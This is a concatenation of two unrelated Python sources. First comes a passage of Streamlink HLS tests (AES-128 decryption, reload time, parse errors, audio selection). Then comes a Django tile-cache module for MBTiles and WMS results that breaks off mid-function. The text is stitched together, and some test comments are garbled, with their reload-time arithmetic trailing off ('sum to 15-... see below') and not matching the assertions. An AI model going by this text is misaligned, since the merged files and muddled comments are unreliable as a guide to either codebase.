        self.assertEqual(self.mocks[self.url(map1)].last_request._request.headers["Range"], "bytes=0-1233")
        self.assertEqual(self.mocks[self.url(map2)].last_request._request.headers["Range"], "bytes=1337-1378")
        self.assertEqual(self.mocks[self.url(s1)].last_request._request.headers["Range"], "bytes=3-7")
        self.assertEqual(self.mocks[self.url(s2)].last_request._request.headers["Range"], "bytes=8-14")
        self.assertEqual(self.mocks[self.url(s3)].last_request._request.headers["Range"], "bytes=15-25")
        self.assertEqual(self.mocks[self.url(s4)].last_request._request.headers["Range"], "bytes=13-29")
        self.assertEqual(self.mocks[self.url(s5)].last_request._request.headers["Range"], "bytes=30-48")
@patch("streamlink.stream.hls.HLSStreamWorker.wait", Mock(return_value=True))
class TestHLSStreamEncrypted(TestMixinStreamHLS, unittest.TestCase):
    # Tests for AES-128 encrypted HLS streams: key fetching, decryption,
    # key URI overriding and handling of broken block/padding data.
    __stream__ = EventedHLSStream
    def get_session(self, options=None, *args, **kwargs):
        # Configure a live-edge of 3 and a custom header so tests can assert
        # that session headers are also used for key/map/segment requests.
        session = super().get_session(options)
        session.set_option("hls-live-edge", 3)
        session.set_option("http-headers", {"X-FOO": "BAR"})
        return session
    def gen_key(self, aes_key=None, aes_iv=None, method="AES-128", uri=None, keyformat="identity", keyformatversions=1):
        # Create (or reuse) an AES key/IV pair, build the EXT-X-KEY tag for it
        # and register the key's URL on the request mocker.
        aes_key = aes_key or os.urandom(16)
        aes_iv = aes_iv or os.urandom(16)
        key = TagKey(method=method, uri=uri, iv=aes_iv, keyformat=keyformat, keyformatversions=keyformatversions)
        self.mock("GET", key.url(self.id()), content=aes_key)
        return aes_key, aes_iv, key
    def test_hls_encrypted_aes128(self):
        aesKey, aesIv, key = self.gen_key()
        # noinspection PyTypeChecker
        thread, segments = self.subject([
            Playlist(0, [key] + [SegmentEnc(num, aesKey, aesIv) for num in range(0, 4)]),
            Playlist(4, [key] + [SegmentEnc(num, aesKey, aesIv) for num in range(4, 8)], end=True)
        ])
        # live-edge of 3 skips segment 0: 3 writes from the first playlist,
        # 4 from the second
        self.await_write(3 + 4)
        data = self.await_read(read_all=True)
        expected = self.content(segments, prop="content_plain", cond=lambda s: s.num >= 1)
        self.assertEqual(data, expected, "Decrypts the AES-128 identity stream")
        self.assertTrue(self.called(key, once=True), "Downloads encryption key only once")
        self.assertEqual(self.get_mock(key).last_request._request.headers.get("X-FOO"), "BAR")
        self.assertFalse(any(self.called(s) for s in segments.values() if s.num < 1), "Skips first segment")
        self.assertTrue(all(self.called(s) for s in segments.values() if s.num >= 1), "Downloads all remaining segments")
        self.assertEqual(self.get_mock(segments[1]).last_request._request.headers.get("X-FOO"), "BAR")
    def test_hls_encrypted_aes128_with_map(self):
        # Encrypted initialization maps must be decrypted and re-emitted before
        # each segment that references them.
        aesKey, aesIv, key = self.gen_key()
        map1 = TagMapEnc(1, namespace=self.id(), key=aesKey, iv=aesIv)
        map2 = TagMapEnc(2, namespace=self.id(), key=aesKey, iv=aesIv)
        self.mock("GET", self.url(map1), content=map1.content)
        self.mock("GET", self.url(map2), content=map2.content)
        # noinspection PyTypeChecker
        thread, segments = self.subject([
            Playlist(0, [key, map1] + [SegmentEnc(num, aesKey, aesIv) for num in range(0, 2)]),
            Playlist(2, [key, map2] + [SegmentEnc(num, aesKey, aesIv) for num in range(2, 4)], end=True)
        ])
        self.await_write(2 * 2 + 2 * 2)
        data = self.await_read(read_all=True)
        self.assertEqual(data, self.content([
            map1, segments[0], map1, segments[1], map2, segments[2], map2, segments[3]
        ], prop="content_plain"))
    def test_hls_encrypted_aes128_key_uri_override(self):
        # hls-segment-key-uri rewrites the playlist's key URL; the playlist's
        # own (invalid) key must never be requested.
        aesKey, aesIv, key = self.gen_key(uri="http://real-mocked/{namespace}/encryption.key?foo=bar")
        aesKeyInvalid = bytes([ord(aesKey[i:i + 1]) ^ 0xFF for i in range(16)])
        _, __, key_invalid = self.gen_key(aesKeyInvalid, aesIv, uri="http://mocked/{namespace}/encryption.key?foo=bar")
        # noinspection PyTypeChecker
        thread, segments = self.subject([
            Playlist(0, [key_invalid] + [SegmentEnc(num, aesKey, aesIv) for num in range(0, 4)]),
            Playlist(4, [key_invalid] + [SegmentEnc(num, aesKey, aesIv) for num in range(4, 8)], end=True)
        ], options={"hls-segment-key-uri": "{scheme}://real-{netloc}{path}?{query}"})
        self.await_write(3 + 4)
        data = self.await_read(read_all=True)
        expected = self.content(segments, prop="content_plain", cond=lambda s: s.num >= 1)
        self.assertEqual(data, expected, "Decrypts stream from custom key")
        self.assertFalse(self.called(key_invalid), "Skips encryption key")
        self.assertTrue(self.called(key, once=True), "Downloads custom encryption key")
        self.assertEqual(self.get_mock(key).last_request._request.headers.get("X-FOO"), "BAR")
    @patch("streamlink.stream.hls.log")
    def test_hls_encrypted_aes128_incorrect_block_length(self, mock_log):
        # Segments whose length isn't a multiple of the AES block size get the
        # trailing garbage cut off before decryption (with a debug log line).
        aesKey, aesIv, key = self.gen_key()
        # noinspection PyTypeChecker
        thread, segments = self.subject([
            Playlist(0, [key] + [
                SegmentEnc(0, aesKey, aesIv, append=b"?" * 1),
                SegmentEnc(1, aesKey, aesIv, append=b"?" * (AES.block_size - 1))
            ], end=True)
        ])
        self.await_write(2)
        data = self.await_read(read_all=True)
        expected = self.content(segments, prop="content_plain")
        self.assertEqual(data, expected, "Removes garbage data from segments")
        self.assertIn(call("Cutting off 1 bytes of garbage before decrypting"), mock_log.debug.mock_calls)
        self.assertIn(call("Cutting off 15 bytes of garbage before decrypting"), mock_log.debug.mock_calls)
    def test_hls_encrypted_aes128_incorrect_padding_length(self):
        # A segment with broken PKCS#7 padding length raises on unpad.
        aesKey, aesIv, key = self.gen_key()
        padding = b"\x00" * (AES.block_size - len(b"[0]"))
        self.subject([
            Playlist(0, [key, SegmentEnc(0, aesKey, aesIv, padding=padding)], end=True)
        ])
        # close read thread early
        self.thread.close()
        with self.assertRaises(ValueError) as cm:
            self.await_write()
        self.assertEqual(str(cm.exception), "Padding is incorrect.", "Crypto.Util.Padding.unpad exception")
    def test_hls_encrypted_aes128_incorrect_padding_content(self):
        # A padding block with the right length byte but wrong filler bytes
        # also raises on unpad.
        aesKey, aesIv, key = self.gen_key()
        padding = (b"\x00" * (AES.block_size - len(b"[0]") - 1)) + bytes([AES.block_size])
        self.subject([
            Playlist(0, [key, SegmentEnc(0, aesKey, aesIv, padding=padding)], end=True)
        ])
        # close read thread early
        self.thread.close()
        with self.assertRaises(ValueError) as cm:
            self.await_write()
        self.assertEqual(str(cm.exception), "PKCS#7 padding is incorrect.", "Crypto.Util.Padding.unpad exception")
@patch("streamlink.stream.hls.HLSStreamWorker.wait", Mock(return_value=True))
class TestHlsPlaylistReloadTime(TestMixinStreamHLS, unittest.TestCase):
    # Tests for the hls-playlist-reload-time option: "default", "segment",
    # "live-edge" and explicit numeric values, with and without playlist data.
    # Segment durations sum to 15s; the last three (live-edge) sum to 15-... see below.
    segments = [
        Segment(0, duration=11),
        Segment(1, duration=7),
        Segment(2, duration=5),
        Segment(3, duration=3)
    ]
    def get_session(self, options=None, reload_time=None, *args, **kwargs):
        # Inject the reload-time option under test; live-edge is fixed at 3.
        return super().get_session(dict(options or {}, **{
            "hls-live-edge": 3,
            "hls-playlist-reload-time": reload_time
        }))
    def subject(self, *args, **kwargs):
        # Run the stream and return the reload time the worker computed.
        thread, segments = super().subject(start=False, *args, **kwargs)
        # mock the worker thread's _playlist_reload_time method, so that the main thread can wait on its call
        playlist_reload_time_called = Event()
        orig_playlist_reload_time = thread.reader.worker._playlist_reload_time
        def mocked_playlist_reload_time(*args, **kwargs):
            playlist_reload_time_called.set()
            return orig_playlist_reload_time(*args, **kwargs)
        # immediately kill the writer thread as we don't need it and don't want to wait for its queue polling to end
        def mocked_futures_get():
            return None, None
        with patch.object(thread.reader.worker, "_playlist_reload_time", side_effect=mocked_playlist_reload_time), \
                patch.object(thread.reader.writer, "_futures_get", side_effect=mocked_futures_get):
            self.start()
            if not playlist_reload_time_called.wait(timeout=5):  # pragma: no cover
                raise RuntimeError("Missing _playlist_reload_time() call")
            # wait for the worker thread to terminate, so that deterministic assertions can be done about the reload time
            thread.reader.worker.join()
        return thread.reader.worker.playlist_reload_time
    def test_hls_playlist_reload_time_default(self):
        time = self.subject([Playlist(0, self.segments, end=True, targetduration=4)], reload_time="default")
        self.assertEqual(time, 4, "default sets the reload time to the playlist's target duration")
    def test_hls_playlist_reload_time_segment(self):
        time = self.subject([Playlist(0, self.segments, end=True, targetduration=4)], reload_time="segment")
        self.assertEqual(time, 3, "segment sets the reload time to the playlist's last segment")
    def test_hls_playlist_reload_time_segment_no_segments(self):
        time = self.subject([Playlist(0, [], end=True, targetduration=4)], reload_time="segment")
        self.assertEqual(time, 4, "segment sets the reload time to the targetduration if no segments are available")
    def test_hls_playlist_reload_time_segment_no_segments_no_targetduration(self):
        time = self.subject([Playlist(0, [], end=True, targetduration=0)], reload_time="segment")
        self.assertEqual(time, 6, "sets reload time to 6 seconds when no segments and no targetduration are available")
    def test_hls_playlist_reload_time_live_edge(self):
        # live-edge=3 sums the last 3 segment durations: 7 + 5 + 3 ... minus the
        # last segment per implementation -> 8 (asserted below)
        time = self.subject([Playlist(0, self.segments, end=True, targetduration=4)], reload_time="live-edge")
        self.assertEqual(time, 8, "live-edge sets the reload time to the sum of the number of segments of the live-edge")
    def test_hls_playlist_reload_time_live_edge_no_segments(self):
        time = self.subject([Playlist(0, [], end=True, targetduration=4)], reload_time="live-edge")
        self.assertEqual(time, 4, "live-edge sets the reload time to the targetduration if no segments are available")
    def test_hls_playlist_reload_time_live_edge_no_segments_no_targetduration(self):
        time = self.subject([Playlist(0, [], end=True, targetduration=0)], reload_time="live-edge")
        self.assertEqual(time, 6, "sets reload time to 6 seconds when no segments and no targetduration are available")
    def test_hls_playlist_reload_time_number(self):
        time = self.subject([Playlist(0, self.segments, end=True, targetduration=4)], reload_time="2")
        self.assertEqual(time, 2, "number values override the reload time")
    def test_hls_playlist_reload_time_number_invalid(self):
        time = self.subject([Playlist(0, self.segments, end=True, targetduration=4)], reload_time="0")
        self.assertEqual(time, 4, "invalid number values set the reload time to the playlist's targetduration")
    def test_hls_playlist_reload_time_no_target_duration(self):
        time = self.subject([Playlist(0, self.segments, end=True, targetduration=0)], reload_time="default")
        self.assertEqual(time, 8, "uses the live-edge sum if the playlist is missing the targetduration data")
    def test_hls_playlist_reload_time_no_data(self):
        time = self.subject([Playlist(0, [], end=True, targetduration=0)], reload_time="default")
        self.assertEqual(time, 6, "sets reload time to 6 seconds when no data is available")
@patch("streamlink.stream.hls.log")
@patch("streamlink.stream.hls.HLSStreamWorker.wait", Mock(return_value=True))
class TestHlsPlaylistParseErrors(TestMixinStreamHLS, unittest.TestCase):
    # Tests for playlist parsing failures: invalid playlists on the first load
    # close the stream with an error; failures on reloads only log a warning.
    # The class-level log patch injects mock_log into every test method.
    __stream__ = EventedHLSStream
    class FakePlaylist(typing.NamedTuple):
        # Stand-in for a parsed playlist; lets tests force the is_master /
        # iframes_only branches without building real playlist documents.
        is_master: bool = False
        iframes_only: bool = False
    class InvalidPlaylist(Playlist):
        # Serializes to a document without the #EXTM3U header.
        def build(self, *args, **kwargs):
            return "invalid"
    def test_generic(self, mock_log):
        # Invalid initial playlist: stream yields no data and closes with an error.
        self.subject([self.InvalidPlaylist()])
        self.assertEqual(self.await_read(read_all=True), b"")
        self.await_close()
        self.assertTrue(self.thread.reader.buffer.closed, "Closes the stream on initial playlist parsing error")
        self.assertEqual(mock_log.debug.mock_calls, [call("Reloading playlist")])
        self.assertEqual(mock_log.error.mock_calls, [call("Missing #EXTM3U header")])
    def test_reload(self, mock_log):
        # Invalid playlists on RELOAD are tolerated: a warning per failure,
        # and the stream continues once a valid playlist appears again.
        thread, segments = self.subject([
            Playlist(1, [Segment(0)]),
            self.InvalidPlaylist(),
            self.InvalidPlaylist(),
            Playlist(2, [Segment(2)], end=True)
        ])
        self.await_write(2)
        data = self.await_read(read_all=True)
        self.assertEqual(data, self.content(segments))
        self.close()
        self.await_close()
        self.assertEqual(mock_log.warning.mock_calls, [
            call("Failed to reload playlist: Missing #EXTM3U header"),
            call("Failed to reload playlist: Missing #EXTM3U header")
        ])
    @patch("streamlink.stream.hls.HLSStreamWorker._reload_playlist", Mock(return_value=FakePlaylist(is_master=True)))
    def test_is_master(self, mock_log):
        # Feeding a master (variant) playlist to the segmented stream is an error.
        self.subject([Playlist()])
        self.assertEqual(self.await_read(read_all=True), b"")
        self.await_close()
        self.assertTrue(self.thread.reader.buffer.closed, "Closes the stream on initial playlist parsing error")
        self.assertEqual(mock_log.debug.mock_calls, [call("Reloading playlist")])
        self.assertEqual(mock_log.error.mock_calls, [
            call(f"Attempted to play a variant playlist, use 'hls://{self.stream.url}' instead")
        ])
    @patch("streamlink.stream.hls.HLSStreamWorker._reload_playlist", Mock(return_value=FakePlaylist(iframes_only=True)))
    def test_iframes_only(self, mock_log):
        # I-frame-only playlists are rejected as unplayable.
        self.subject([Playlist()])
        self.assertEqual(self.await_read(read_all=True), b"")
        self.await_close()
        self.assertTrue(self.thread.reader.buffer.closed, "Closes the stream on initial playlist parsing error")
        self.assertEqual(mock_log.debug.mock_calls, [call("Reloading playlist")])
        self.assertEqual(mock_log.error.mock_calls, [call("Streams containing I-frames only are not playable")])
@patch('streamlink.stream.hls.FFMPEGMuxer.is_usable', Mock(return_value=True))
class TestHlsExtAudio(unittest.TestCase):
    """
    Tests for the hls-audio-select option against a variant playlist that
    declares EXT-X-MEDIA audio renditions ("en" and "es").
    """

    @property
    def playlist(self):
        # Fixture master playlist with one video rendition and two audio renditions.
        with text("hls/test_2.m3u8") as fixture:
            return fixture.read()

    def run_streamlink(self, playlist, audio_select=None):
        # Build a session (optionally with hls-audio-select) and parse the playlist.
        session = Streamlink()
        if audio_select:
            session.set_option("hls-audio-select", audio_select)
        return HLSStream.parse_variant_playlist(session, playlist)

    def _selected_urls(self, audio_select):
        # Parse the mocked master playlist with the given audio selection and
        # return the URLs of the "video" quality's substreams.
        master_url = "http://mocked/path/master.m3u8"
        with requests_mock.Mocker() as mock:
            mock.get(master_url, text=self.playlist)
            stream = self.run_streamlink(master_url, audio_select)
        return [substream.url for substream in stream['video'].substreams]

    def test_hls_ext_audio_not_selected(self):
        """Without hls-audio-select, the plain (un-muxed) video stream is returned."""
        master_url = "http://mocked/path/master.m3u8"
        with requests_mock.Mocker() as mock:
            mock.get(master_url, text=self.playlist)
            video = self.run_streamlink(master_url)['video']
        # a plain HLSStream has no substreams attribute at all
        with pytest.raises(AttributeError):
            video.substreams
        assert video.url == 'http://mocked/path/playlist.m3u8'

    def test_hls_ext_audio_en(self):
        """Selecting 'en' muxes the video with the English audio rendition."""
        self.assertEqual(
            self._selected_urls('en'),
            ['http://mocked/path/playlist.m3u8', 'http://mocked/path/en.m3u8']
        )

    def test_hls_ext_audio_es(self):
        """Selecting 'es' muxes the video with the Spanish audio rendition."""
        self.assertEqual(
            self._selected_urls('es'),
            ['http://mocked/path/playlist.m3u8', 'http://mocked/path/es.m3u8']
        )

    def test_hls_ext_audio_all(self):
        """Selecting 'en,es' muxes the video with both audio renditions."""
        self.assertEqual(
            self._selected_urls('en,es'),
            ['http://mocked/path/playlist.m3u8', 'http://mocked/path/en.m3u8', 'http://mocked/path/es.m3u8']
        )

    def test_hls_ext_audio_wildcard(self):
        """The '*' wildcard selects every available audio rendition."""
        self.assertEqual(
            self._selected_urls('*'),
            ['http://mocked/path/playlist.m3u8', 'http://mocked/path/en.m3u8', 'http://mocked/path/es.m3u8']
        )
|
|
import os
import math
from django.conf import settings
from osgeo import osr
from pysqlite2 import dbapi2 as db
from hashlib import md5
from collections import OrderedDict
import sh
import logging
from terrapyn.geocms import dispatch
# Module-level logger for driver diagnostics.
_log = logging.getLogger('terrapyn.driver_messages')
# Root directory for cached artifacts; falls back to MEDIA_ROOT when
# settings.CACHE_ROOT is not configured.
CACHE_ROOT = getattr(settings, 'CACHE_ROOT', settings.MEDIA_ROOT)
# Directory holding the cache directory database and per-entry cache files.
LAYER_CACHE_PATH = getattr(settings, "LAYER_CACHE_PATH", os.path.join(CACHE_ROOT, '.cache', 'layers'))
# Ensure both cache directories exist at import time ("mkdir -p" is a no-op
# when the directory already exists).
if not os.path.exists(CACHE_ROOT):
    sh.mkdir('-p', CACHE_ROOT)
if not os.path.exists(LAYER_CACHE_PATH):
    sh.mkdir('-p', LAYER_CACHE_PATH)
def data_cache_path(page, page_id_field='slug'):
    """
    Return (creating it if necessary) the local data cache directory for *page*.

    :param page: object whose identifier attribute names the cache subdirectory
    :param page_id_field: attribute on *page* holding its identifier
    :return: the cache directory path
    """
    identifier = getattr(page, page_id_field)
    # split the identifier so slash-separated slugs become nested directories
    cache_dir = os.path.join(CACHE_ROOT, '.cache', 'data', *os.path.split(identifier))
    if not os.path.exists(cache_dir):
        sh.mkdir('-p', cache_dir)
    return cache_dir
def delete_data_cache(page, page_id_field='slug'):
    """Recursively remove the page's local data cache directory (it is recreated on next use)."""
    sh.rm('-rf', data_cache_path(page, page_id_field))
# Cache files derived from each directory entry; kept in one place so trim and
# removal code stay in sync.
_CACHE_FILE_EXTS = ('.mbtiles', '.json', '.wmsresults', '.mml', '.xml', '.carto')


def trim_cache(layers=None, styles=None):
    """
    Destroy relevant tile caches and cached mapnik files that are affected by a
    style or layer change.

    :param layers: iterable of layer slugs whose caches should be removed
    :param styles: iterable of style slugs whose caches should be removed
    """
    # avoid mutable default arguments (the original used list() defaults)
    layers = layers or []
    styles = styles or []
    basenames = []
    conn = db.connect(os.path.join(LAYER_CACHE_PATH, 'directory.sqlite'))
    c = conn.cursor()
    # BUG FIX: executemany() cannot be used with SELECT statements (and returns
    # no rows); query per slug and collect the results. Also use the
    # "cache_name" column, which is what CacheManager actually creates —
    # the original queried a nonexistent "basename" column.
    for slug in layers:
        c.execute('select cache_name from layers where slug=?', (slug,))
        basenames.extend(row[0] for row in c.fetchall())
    for slug in styles:
        c.execute('select cache_name from styles where slug=?', (slug,))
        basenames.extend(row[0] for row in c.fetchall())
    c.close()
    for name in basenames:
        for ext in _CACHE_FILE_EXTS:
            if os.path.exists(name + ext):
                os.unlink(name + ext)
### following procedures and functions are in support of the tiled mapping services, TMS
def deg2num(lat_deg, lon_deg, zoom):
    """
    Convert a WGS84 coordinate to slippy-map tile indices at a zoom level.

    :param lat_deg: latitude in degrees
    :param lon_deg: longitude in degrees
    :param zoom: web mercator zoom level
    :return: (xtile, ytile) tile coordinates as a tuple
    """
    tiles_per_axis = 2.0 ** zoom
    lat = math.radians(lat_deg)
    xtile = int((lon_deg + 180.0) / 360.0 * tiles_per_axis)
    ytile = int((1.0 - math.log(math.tan(lat) + (1 / math.cos(lat))) / math.pi) / 2.0 * tiles_per_axis)
    return (xtile, ytile)
def num2deg(xtile, ytile, zoom):
    """
    Convert slippy-map tile indices to the WGS84 coordinate of the tile's
    upper-left (north-west) corner.

    NOTE(review): a previous docstring said "southwest"; callers obtain the
    south-west corner via num2deg(x, y + 1, zoom), so this returns the NW corner.

    :param xtile: tile column
    :param ytile: tile row
    :param zoom: web mercator zoom level
    :return: (lon_deg, lat_deg) pair
    """
    tiles_per_axis = 2.0 ** zoom
    lon_deg = xtile / tiles_per_axis * 360.0 - 180.0
    lat_deg = math.degrees(math.atan(math.sinh(math.pi * (1 - 2 * ytile / tiles_per_axis))))
    return (lon_deg, lat_deg)
class MBTileCache(object):
    """
    MBTiles is MapBox's tile cache format. We use it to store rendered tiles for display in a compact format.

    One instance manages a single ``.mbtiles`` sqlite file, unique to a
    combination of layers, styles, rendering options, and spatial reference.
    """
    # Web mercator in proj.4 form. NOTE: currently the only supported SRS —
    # the slippy-map tile math in deg2num/num2deg assumes it.
    STANDARD_SRS = "+proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0 +k=1.0 +units=m +nadgrids=@null"

    def __init__(self, layers, styles, bgcolor=None, transparent=True, query=None, srs=STANDARD_SRS, **kwargs):
        """
        Defines a cache that is specific to a set of layers, styles, spatial reference, and extra keyword args that
        are passed to the renderer.

        NOTE: currently only the standard SRS is supported. This relies on the slippy map tile specification for
        geodetic coordinate to tile index location.

        :param layers: a list of layer identifier strings (a single string is accepted and wrapped)
        :param styles: a list of style identifier strings (a single string is accepted and wrapped)
        :param bgcolor: a hextuple of RGB background color
        :param transparent: whether or not the background is transparent
        :param query: a query that limits the results
        :param srs: a spatial reference system in proj.4 format. Typically (and by standard) Google Mercator
        :param kwargs: extra keyword args to pass to the renderer
        """
        self.srs = srs
        self.name = CacheManager.cache_entry_name(layers, self.srs, styles, bgcolor, transparent, query)
        self.cachename = self.name + '.mbtiles'
        # normalize single identifiers to one-element lists
        self.layers = layers if not isinstance(layers, basestring) else [layers]
        self.styles = styles if not isinstance(styles, basestring) else [styles]
        self.kwargs = kwargs
        # build a WGS84 -> web mercator coordinate transformation, used to
        # express tile bounds in the renderer's coordinate space
        e4326 = osr.SpatialReference()
        e3857 = osr.SpatialReference()
        e4326.ImportFromEPSG(4326)
        e3857.ImportFromEPSG(3857)
        self.crx = osr.CoordinateTransformation(e4326, e3857)
        self.cache = self._ensure_cache_initted()

    def _ensure_cache_initted(self):
        """Open the mbtiles database, creating the full MBTiles schema on first use."""
        if not os.path.exists(self.cachename):
            _log.info("Creating new tile cache for {0}".format(self.name))
            conn = db.connect(self.cachename)
            cursor = conn.cursor()
            cursor.executescript("""
            BEGIN TRANSACTION;
            CREATE TABLE android_metadata (locale text);
            CREATE TABLE grid_key (grid_id TEXT,key_name TEXT);
            CREATE TABLE grid_utfgrid (grid_id TEXT,grid_utfgrid BLOB);
            CREATE TABLE keymap (key_name TEXT,key_json TEXT);
            CREATE TABLE images (tile_data blob,tile_id text);
            CREATE TABLE map
            (zoom_level INTEGER,tile_column INTEGER,tile_row INTEGER,tile_id TEXT,grid_id TEXT);
            CREATE TABLE metadata (name text,value text);
            CREATE VIEW tiles
              AS SELECT
                map.zoom_level AS zoom_level,
                map.tile_column AS tile_column,
                map.tile_row AS tile_row,
                images.tile_data AS tile_data
              FROM map
                JOIN images ON images.tile_id = map.tile_id
              ORDER BY zoom_level,tile_column,tile_row;
            CREATE VIEW grids
              AS SELECT
                map.zoom_level AS zoom_level,
                map.tile_column AS tile_column,
                map.tile_row AS tile_row,
                grid_utfgrid.grid_utfgrid AS grid
              FROM map
                JOIN grid_utfgrid ON grid_utfgrid.grid_id = map.grid_id;
            CREATE VIEW grid_data
              AS SELECT
                map.zoom_level AS zoom_level,
                map.tile_column AS tile_column,
                map.tile_row AS tile_row,
                keymap.key_name AS key_name,
                keymap.key_json AS key_json
              FROM map
                JOIN grid_key ON map.grid_id = grid_key.grid_id
                JOIN keymap ON grid_key.key_name = keymap.key_name;
            CREATE UNIQUE INDEX grid_key_lookup ON grid_key (grid_id,key_name);
            CREATE UNIQUE INDEX grid_utfgrid_lookup ON grid_utfgrid (grid_id);
            CREATE UNIQUE INDEX keymap_lookup ON keymap (key_name);
            CREATE UNIQUE INDEX images_id ON images (tile_id);
            CREATE UNIQUE INDEX map_index ON map (zoom_level, tile_column, tile_row);
            CREATE UNIQUE INDEX name ON metadata (name);
            END TRANSACTION;
            ANALYZE;
            VACUUM;
            """)
            cursor.close()
            return conn
        else:
            return db.connect(self.cachename)

    def fetch_tile(self, z, x, y):
        """
        Fetch map by slippy map tile ID. Render it if it's not rendered already.

        :param z: zoom level
        :param x: tile column
        :param y: tile row
        :return: (rendered, blob) — ``rendered`` is True when this call rendered
            the tile (cache miss); ``blob`` is the PNG tile data
        """
        tile_id = u':'.join(str(k) for k in (z, x, y))
        # tile bounds in web mercator; num2deg yields the NW corner, hence the
        # y+1 / x+1 shifts for the SW and NE corners
        sw = self.crx.TransformPoint(*num2deg(x, y + 1, z))
        ne = self.crx.TransformPoint(*num2deg(x + 1, y, z))
        width = 256
        height = 256
        insert_map = "INSERT OR REPLACE INTO map (tile_id,zoom_level,tile_column,tile_row,grid_id) VALUES(?,?,?,?,'');"
        insert_data = "INSERT OR REPLACE INTO images (tile_id,tile_data) VALUES(?,?);"
        c = self.cache.cursor()
        c.execute("SELECT tile_data FROM images WHERE tile_id=?", [tile_id])
        row = c.fetchone()
        # BUG FIX: the original wrapped the fetch in a bare ``except:`` that
        # also swallowed genuine database errors; test the row explicitly.
        if row is not None:
            rendered = False
            blob = buffer(row[0])
        else:
            rendered = True
            dispatch.tile_rendered.send(sender=CacheManager, layers=self.layers, styles=self.styles)
            if getattr(settings, 'USE_CELERY', False):
                from terrapyn.geocms.tasks import render as delayed_render
                blob = delayed_render.delay(
                    'png', width, height,
                    (sw[0], sw[1], ne[0], ne[1]), self.srs, self.styles, self.layers, **self.kwargs).get()
            else:
                from terrapyn.geocms.rendering import Renderer
                filename, blob = Renderer().render(
                    'png',
                    width,
                    height,
                    (sw[0], sw[1], ne[0], ne[1]),
                    self.srs,
                    self.styles,
                    self.layers,
                    **self.kwargs)
            # NOTE(review): tiles <= 350 bytes are not cached — presumably
            # blank/uniform tiles; confirm the threshold's intent.
            if len(blob) > 350:
                blob = buffer(blob)
                d = self.cache.cursor()
                d.execute(insert_map, [tile_id, z, x, y])
                d.execute(insert_data, [tile_id, blob])
                self.cache.commit()
                d.close()
        c.close()
        return rendered, blob

    def seed_tiles(self, min_zoom, max_zoom, minx, miny, maxx, maxy):
        """
        Force rendering of tiles for an area.

        :param min_zoom: lowest zoom level to seed (inclusive)
        :param max_zoom: highest zoom level to seed (inclusive)
        :param minx: west bound (degrees lon)
        :param miny: south bound (degrees lat)
        :param maxx: east bound (degrees lon)
        :param maxy: north bound (degrees lat)
        """
        for z in range(min_zoom, max_zoom + 1):
            mnx, mny = deg2num(miny, minx, z)
            mxx, mxy = deg2num(maxy, maxx, z)
            for x in range(mnx, mxx + 1):
                for y in range(mny, mxy + 1):
                    self.fetch_tile(z, x, y)

    @classmethod
    def shave_cache(cls, filename, bbox):
        """
        Empties a bounding box out of the cache at all zoom levels to be regenerated on demand. For supporting
        minor edits on data.

        :param filename: path of the .mbtiles file
        :param bbox: (x1, y1, x2, y2) in web mercator coordinates
        :return:
        """
        x1, y1, x2, y2 = bbox
        conn = db.connect(filename)
        c = conn.cursor()
        # BUG FIX: the original issued the min() and max() queries back to back
        # and only then called fetchone() twice, so min_zoom received the max()
        # result and max_zoom received None. Fetch both aggregates at once.
        c.execute('select min(zoom_level), max(zoom_level) from map')
        row = c.fetchone()
        min_zoom = row[0] if row and row[0] is not None else 0
        max_zoom = row[1] if row and row[1] is not None else 32
        c.close()
        c = conn.cursor()
        del_map_entry = """
        DELETE FROM map WHERE
            tile_column >= ? AND
            tile_row >= ? AND
            tile_column <= ? AND
            tile_row <= ? AND
            zoom_level = ?
        """
        del_tile_data = """
        DELETE FROM images
        WHERE tile_id IN (
            SELECT tile_id
            FROM map WHERE
                tile_column >= ? AND
                tile_row >= ? AND
                tile_column <= ? AND
                tile_row <= ? AND
                zoom_level = ?
        )
        """
        # transform the bbox from web mercator back to lat/lon for deg2num
        e4326 = osr.SpatialReference()
        e3857 = osr.SpatialReference()
        e4326.ImportFromEPSG(4326)
        e3857.ImportFromEPSG(3857)
        crx = osr.CoordinateTransformation(e3857, e4326)
        x1, y1, _ = crx.TransformPoint(x1, y1)
        x2, y2, _ = crx.TransformPoint(x2, y2)
        for zoom in range(min_zoom, max_zoom + 1):
            a1, b1 = deg2num(y1, x1, zoom)
            a2, b2 = deg2num(y2, x2, zoom)
            c.execute(del_tile_data, [a1, b1, a2, b2, zoom])
            c.execute(del_map_entry, [a1, b1, a2, b2, zoom])
        c.execute('ANALYZE')
        c.execute('VACUUM')
        conn.commit()
        conn.close()
class WMSResultsCache(object):
    """
    Spatially indexed (spatialite) cache for rendered WMS results, keyed by a
    hash of the render spec and prunable by bounding box when data changes.
    """

    def __init__(self, layers, srs, styles, **kwargs):
        """
        :param layers: list of layer identifiers
        :param srs: spatial reference (proj.4 or EPSG code)
        :param styles: list of style identifiers
        :param kwargs: extra renderer options (bgcolor, transparent, query, ...)
        """
        self.name = CacheManager.cache_entry_name(
            layers, srs, styles,
            bgcolor=kwargs.get('bgcolor', None),
            transparent=kwargs.get('transparent', False),
            query=kwargs.get('query', None)
        )
        self.cachename = self.name + '.wmscache'
        self.srs = srs
        self.layers = layers
        self.styles = styles
        self.kwargs = kwargs
        # A fresh cache file needs its schema created; an existing one only
        # needs the spatialite extension loaded (the original duplicated the
        # connect/load-extension code in both branches).
        create_schema = not os.path.exists(self.cachename)
        conn = db.connect(self.cachename)
        conn.enable_load_extension(True)
        conn.execute("select load_extension('libspatialite.so')")
        if create_schema:
            cursor = conn.cursor()
            cursor.executescript("""
            BEGIN TRANSACTION;
            SELECT InitSpatialMetadata();
            CREATE TABLE tiles (hash_key TEXT, last_use DATETIME, tile_data BLOB);
            SELECT AddGeometryColumn('tiles','bounds', 4326, 'POLYGON', 'XY');
            SELECT CreateSpatialIndex('tiles','bounds');
            CREATE UNIQUE INDEX hash_key_lookup ON tiles (hash_key);
            CREATE INDEX lru ON tiles (last_use);
            END TRANSACTION;
            ANALYZE;
            VACUUM;
            """)
            cursor.close()
        self.cache = conn

    @classmethod
    def shave_cache(cls, filename, bbox):
        """
        Empties a cache of all records overlapping a certain bounding box so they are regenerated on demand. For
        supporting minor edits on data.

        :param filename: path of the .wmscache file
        :param bbox: (x1, y1, x2, y2) bounding box
        :return:
        """
        x1, y1, x2, y2 = bbox
        conn = db.connect(filename)
        # bbox components are numeric coordinates, so interpolating them into
        # the statement is safe here
